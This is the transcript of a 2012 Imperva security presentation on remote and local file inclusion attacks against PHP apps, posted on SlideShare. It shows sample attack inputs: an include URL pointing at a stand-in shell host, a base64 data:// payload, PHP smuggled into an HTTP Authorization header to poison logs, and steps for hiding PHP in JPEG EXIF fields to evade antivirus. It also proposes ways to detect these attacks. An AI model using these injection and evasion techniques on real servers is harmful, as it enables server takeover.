Your SlideShare is downloading. ×
How to Prevent RFI and LFI Attacks
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

How to Prevent RFI and LFI Attacks

3,948
views

Published on

Did you know remote and local file inclusion (RFI/LFI) was among the four most prevalent Web application attacks in 2011? Why is RFI/LFI so attractive to hackers? Quite simply, with RFI/LFI a hacker …

Did you know remote and local file inclusion (RFI/LFI) was among the four most prevalent Web application attacks in 2011? Why is RFI/LFI so attractive to hackers? Quite simply, with RFI/LFI a hacker can take over a Web server. RFI and LFI attacks primarily affect Web applications written in the PHP programming language. PHP is the most popular server-side programming language. In fact, PHP is used by 77.2% of today’s Web sites. This presentation looks at how hackers use RFI/LFI and avoid traditional detection techniques.

Published in: Technology

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,948
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
39
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. How to Prevent Remote & Local File Inclusion AttacksTal Be’eryWeb Security Research Team Leader, Imperva
  • 2. Tal Be’ery, CISSP  Web Security Research Team Leader at Imperva  Holds MSc & BSc degree in CS/EE from TAU  10+ experience in the IS domain  Facebook “white hat”  Speaker at RSA, BlackHat, AusCERT © 2012 Imperva, Inc. All rights reserved.
  • 3. Contents  PHP Background and Internals  RFI Insight + Analysis of TimThumb shell “caught in the wild” + Advanced RFI using PHP streams and Wrappers  LFI Insight + Innovative method for editing file content to embed PHP code and evade AV detection + Novel detection method  RFI and LFI in the Wild + New detection method using community based reputation data  Questions and Answers 3 © 2012 Imperva, Inc. All rights reserved.
  • 4. RFI, LFI - Under the Radar  PHP is everywhere  Exploiting PHP’s include vulnerabilities with RFI LFI attacks leads to full server takeover  Hackers are actively attacking organizations + TimThumb exploit reportedly compromised 1.2 million pages  And yet.. + OWASP Top 10 in 2007 (#3) + Dropped in 2010 © 2012 Imperva, Inc. All rights reserved.
  • 5. Breadth and Depth of PHP  The most popular server-side programming language in the world! © 2012 Imperva, Inc. All rights reserved.
  • 6. Breadth and Depth of PHP  Popular Web applications are powered by PHP © 2012 Imperva, Inc. All rights reserved.
  • 7. PHP Internals - Parser HTML Mode  PHP’s parser starts on HTML mode  Ignores everything until it hits a PHPs opening tag + typically “<?php”, but also “<?”  PHP code is now parsed and compiled  When parser hits a closing tag (“?>”), it drops back to HTML mode  Allows “mixed” coding © 2012 Imperva, Inc. All rights reserved.
  • 8. PHP Internals - PHP Execution Steps Parsing • Code is converted into tokens (Lexing)… • Tokens are processed into meaningful expressions (Parsing). Compiling • Derived expressions are converted into OpCodes. Execution • OpCodes are executed by the PHP engine. 8 © 2012 Imperva, Inc. All rights reserved.
  • 9. PHP Internals - Disassembling with VLD Extension PHP Dumps the Extension Code is Vulcan Logic OpCodes of • http://pecl.php.net/ compiled but Disassembler complied package/vld not executed • Maintainers - Derick PHP scripts Rethans (lead) 9 © 2012 Imperva, Inc. All rights reserved.
  • 10. PHP Internals - VLD Analysis Demo Compile © 2012 Imperva, Inc. All rights reserved.
  • 11. PHP internals - Include()  The include() statement includes and evaluates the specified file  Used to share code by reference  PHP Version >=4.3 + Remote files (http://) are valid include targets  The parser drops to HTML mode at the beginning of the included file © 2012 Imperva, Inc. All rights reserved.
  • 12. And You Thought Eval() is Evil…  Meet Eval()’s hungry sister – include()  Not only does she evaluate arbitrary code  She eats everything before code + HTML mode - Code can be prepended with anything (including binary content)  She loves dining out + Code can reside outside of the application © 2012 Imperva, Inc. All rights reserved.
  • 13. RFI Exploitation  Simple vulnerable app for warm up  Exploit: + http://www.vulnerable.com/test.php?file=http://www.malicious. com/shell.txt © 2012 Imperva, Inc. All rights reserved.
  • 14. RFI in the Wild14 © 2012 Imperva, Inc. All rights reserved.
  • 15. Hacker Intel – Observations in the Wild  Hackers Intelligence Initiative (HII) + Initiated in 2010 + Goes deep inside the cyber-underground and provides analysis of trending hacking techniques and attack campaigns in real time + Includes honey pots consisting of 40 Web applications + Analyzes security logs © 2012 Imperva, Inc. All rights reserved.
  • 16. RFI in the Wild - TimThumb  TimThumb - + A WordPress extension to produce thumbnails of images + Vulnerable to RFI + 1.2 million exploited pages © 2012 Imperva, Inc. All rights reserved.
  • 17. TimThumb Exploit Analysis  Shell host - picasa.com.moveissantafe.com + Evaded TimThumb filter that allowed inclusion only from limited set of hosts + The implemented host check mistakenly allowed “picasa.com.moveissantafe.com” to pass as “picasa.com”  Started with a GIF file identifier, but then switched to encoded PHP + Evaded another TimThumb security filter used to verify that the file was indeed a valid picture © 2012 Imperva, Inc. All rights reserved.
  • 18. TimThumb Exploit Analysis, Continued  Execution was controlled with additional HTTP parameters + LOL and OSC © 2012 Imperva, Inc. All rights reserved.
  • 19. TimThumb Exploit Analysis, Continued  Execution was controlled with additional HTTP parameters + LOL and OSC © 2012 Imperva, Inc. All rights reserved.
  • 20. TimThumb Exploit Analysis, Continued  Execution was controlled with additional HTTP parameters + LOL and OSC © 2012 Imperva, Inc. All rights reserved.
  • 21. TimThumb Exploit Analysis, Continued  Execution was controlled with additional HTTP parameters + LOL and OSC © 2012 Imperva, Inc. All rights reserved.
  • 22. Advanced RFI with PHP Streams22 © 2012 Imperva, Inc. All rights reserved.
  • 23. Advanced RFI with PHP Streams  Streams are a way of generalizing file, network, data compression, and other operations  Examples: + Accessing HTTP(s) URLs - http:// https:// + Accessing FTP(s) URLs - ftp:// ftps:// + Data ( RFC 2397) - data:// + Accessing local filesystem - file:// + Accessing various I/O streams - php:// + Compression Streams - zlib:// , bzip2:// , zip:// © 2012 Imperva, Inc. All rights reserved.
  • 24. RFI PHP Streams  Hacker’s objective + Run the following code <?php phpinfo(); ?> on RFI vulnerable app  Degree of difficulty + No shell hosting is allowed  Means + Bare hands © 2012 Imperva, Inc. All rights reserved.
  • 25. RFI PHP Streams - Attack Example  base64(“<?php phpinfo()?>”) = "PD9waHAgcGhwaW5mbygpPz4="  Wrapped in data wrapper: + "data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=" © 2012 Imperva, Inc. All rights reserved.
  • 26. RFI PHP Streams - Attack Example, Continued © 2012 Imperva, Inc. All rights reserved.
  • 27. RFI PHP Streams - Attack Example, Continued Mission Accomplished! © 2012 Imperva, Inc. All rights reserved.
  • 28. PHP Streams - Why Hackers Use Them  To evade security filters + Many filters look only for exploits with the standard protocols  To hide attack source + Shell URL obfuscation (compressed, base64)  To compromise without a hosted shell + Using data wrapper © 2012 Imperva, Inc. All rights reserved.
  • 29. Local File Inclusion29 © 2012 Imperva, Inc. All rights reserved.
  • 30. LFI - Why Hackers Use It  LFI – malicious code must be stored locally  Extra work – why bother?  Because RFI is disabled by default + PHP version 5.2: allow_url_include = off + ~ 90% PHP deployments versions >=5.2 © 2012 Imperva, Inc. All rights reserved.
  • 31. LFI - How to be Local  Abuse existing file write functionality within the server – log files  Abuse file upload functionality to embed malicious code within the uploaded file  Let’s demo it… © 2012 Imperva, Inc. All rights reserved.
  • 32. LFI - Attacking Logs  Hacker’s objective + Run the following code <?php phpinfo(); ?>  Degree of difficulty + allow_url_include = off, code must be local  Means + Proxy (or any other way to edit HTTP headers) © 2012 Imperva, Inc. All rights reserved.
  • 33. LFI - Attacking Logs Example Authorization: Basic base64(user:pass) = Authorization: Basic base64(<?php phpinfo()?>:123456) = Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY=) © 2012 Imperva, Inc. All rights reserved.
  • 34. LFI - Attacking Logs Example, Continued © 2012 Imperva, Inc. All rights reserved.
  • 35. LFI - Attacking Logs Example, Continued Mission Accomplished! © 2012 Imperva, Inc. All rights reserved.
  • 36. LFI - Abusing Upload  Hacker’s objective + Upload a picture with known malicious code to create LFI  Degree of difficulty + Picture appearance must not change + AV must not detect the code  Means + Bare hands © 2012 Imperva, Inc. All rights reserved.
  • 37. LFI – Abusing Upload Example Initial PHP Code  <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>  Prints FeeLCoMz twice  Found in the wild  Detected by AVs © 2012 Imperva, Inc. All rights reserved.
  • 38. LFI – Abusing Upload Example Embedding Code in Picture, Phase I  Picture – jpg format  Editing EXIF properties © 2012 Imperva, Inc. All rights reserved.
  • 39. LFI – Abusing Upload Example Embedding Code in Picture, Phase I  Picture – jpg format  Editing EXIF properties Better… But not good enough! © 2012 Imperva, Inc. All rights reserved.
  • 40. LFI – Abusing Upload Example Embedding Code in Picture, Phase II  Let’s split the vector across two adjacent properties © 2012 Imperva, Inc. All rights reserved.
  • 41. LFI – Abusing Upload Example Embedding Code in Picture, Phase II  Let’s split the vector across two adjacent properties Better… But not good enough! © 2012 Imperva, Inc. All rights reserved.
  • 42. LFI – Abusing Upload Example Embedding Code in Picture, Phase III  Now it gets personal  ClamAV signature PHP.Hide- 1 :0:0:ffd8ffe0?0104a464946{- 4000}3c3f706870(0d|20|0a)  3c3f706870 is hex for <?php.  Maybe changing the case will work… © 2012 Imperva, Inc. All rights reserved.
  • 43. LFI – Abusing Upload Example, Recap  Hacker’s objective + Upload a picture with known malicious code to create LFI  Degree of difficulty + Picture appearance must not change + AV must not detect the code © 2012 Imperva, Inc. All rights reserved.
  • 44. LFI – Abusing Upload Example, Recap  Hacker’s objective + Upload a picture with known malicious code to create LFI  Degree of difficulty + Picture appearance must not change + AV must not detect the code © 2012 Imperva, Inc. All rights reserved.
  • 45. LFI – Abusing Upload Example, Recap  Hacker’s objective + Upload a picture with known malicious code to create LFI  Degree of difficulty + Picture appearance must not change + AV must not detect the Accomplished! Mission code © 2012 Imperva, Inc. All rights reserved.
  • 46. LFI – Abusing Upload - Why AV Fails  General purpose AVs search only for malicious code. + In the context of LFI exploit detection we are OK with detecting files containing any PHP code.  General purpose AVs are built to find compiled malicious code. + Finding malicious source code requires a different set of features and awareness to text related evasions. © 2012 Imperva, Inc. All rights reserved.
  • 47. LFI - Abusive File Upload Misdetection  Anti Virus - we just witnessed how they fail at this task  Degenerated PHP parser - Looks only for PHP begin/end tokens. + Looks for short tags (<?.*?>) - many false positives  Compile the uploaded file and check if it compiles + Even benign documents are (trivially) compiled  Run the file and see if it executes – hmm…  © 2012 Imperva, Inc. All rights reserved.
  • 48. LFI - Abusive Upload File Detection  VLD it! + Compile the file with VLD + Inspect the OpCodes + No execution  A non-PHP code bearing files will yield only two OpCodes + ECHO – to print the non PHP code + RETURN – to return after the “execution” © 2012 Imperva, Inc. All rights reserved.
  • 49. LFI - Abusive File Detection with VLD Demo © 2012 Imperva, Inc. All rights reserved.
  • 50. RFI, LFI in the Wild50 © 2012 Imperva, Inc. All rights reserved.
  • 51. RFI, LFI in the Wild  Very relevant + 20% of all Web application attacks  LFI is more prevalent than RFI + 90% of PHP deployments are of versions that do not allow RFI by default © 2012 Imperva, Inc. All rights reserved.
  • 52. RFI in the Wild - Sources Analysis  Highly automated  Consistent attackers © 2012 Imperva, Inc. All rights reserved.
  • 53. RFI in the Wild - Sources Analysis  Many sources attack more than one target © 2012 Imperva, Inc. All rights reserved.
  • 54. RFI in the Wild - Shell Hosting URLs Analysis Obtaining shell hosting URLs:btaining shell hosting URLs: 1. Analyze Honey pot’s RFI Security Log entry http://www.vulnerable.com/test.php?file=http://www. malicious.com/shell.txt 2. Download the shell - wget http://www.malicious.com/shell.txt 3. Verify it’s a script – to refrain from false positives © 2012 Imperva, Inc. All rights reserved.
  • 55. RFI in the Wild - Shell Hosting URLs Analysis  Some URLs are being used consistently © 2012 Imperva, Inc. All rights reserved.
  • 56. RFI in the Wild - Shell Hosting URLs Analysis  Many shell URLs are used against more than one target © 2012 Imperva, Inc. All rights reserved.
  • 57. A New Approach - Community Based RFI Black Lists  Attack characteristics (source, Shell URL) + Non transient – stable for days + General - not confined to a single honey pot  By forming a community that shares RFI data we can create black lists + Attack sources + Attackers’ shell hosting URLs  Achieve better protection! © 2012 Imperva, Inc. All rights reserved.
  • 58. Additional Resources58 © 2012 Imperva, Inc. All rights reserved.
  • 59. Hacker Intelligence Initiative  Subscribe to Imperva’s Hacker Intelligence Initiative (HII): + Sign up to stay informed on all the latest attacks and hacking techniques  Download HII RFI Resources: + Report: Remote File Inclusion (RFI) Vulnerabilities 101 + Infographic: Exploiting RFI Attacks 101 59 © 2012 Imperva, Inc. All rights reserved.
  • 60. Presentation Materials Join Imperva’s LinkedIn Group Data Security Direct for… Post- Answers to Presentation Attendee Discussions Questions Link to Link to Presentation Presentation Audio Slides http://www.linkedin.com/groups/Imperva-Data-Security-Direct-3849609 © 2012 Imperva, Inc. All rights reserved.
  • 61. www.imperva.com- CONFIDENTIAL -